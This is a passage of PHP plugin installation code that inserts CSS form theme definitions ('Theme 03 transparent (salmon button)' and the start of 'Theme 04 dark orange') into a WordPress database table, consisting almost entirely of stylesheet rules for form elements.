border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #0C6177;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #2796B3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0E6378 ), color-stop(39%, #2C7487 ), color-stop(100%, #2D7587 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/03/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 03 transparent (salmon button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8D6D7;\r\nborder: 1px solid #D8D6D7;\r\nmargin-bottom: 10px;\r\ncolor: #D8D6D7;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\nbackground: #FA8072;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #FFABA1;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #FF9689;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #FF9A8E;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #FA8072;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF8F83; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F7B4AC), color-stop(39%, #F89F95), color-stop(100%, #FF8F83)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/04/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 04 dark orange\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #F6CE9D;\r\nmargin-bottom: 10px;\r\ncolor: #F6CE9D;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E2B983 !important;\r\n	color: 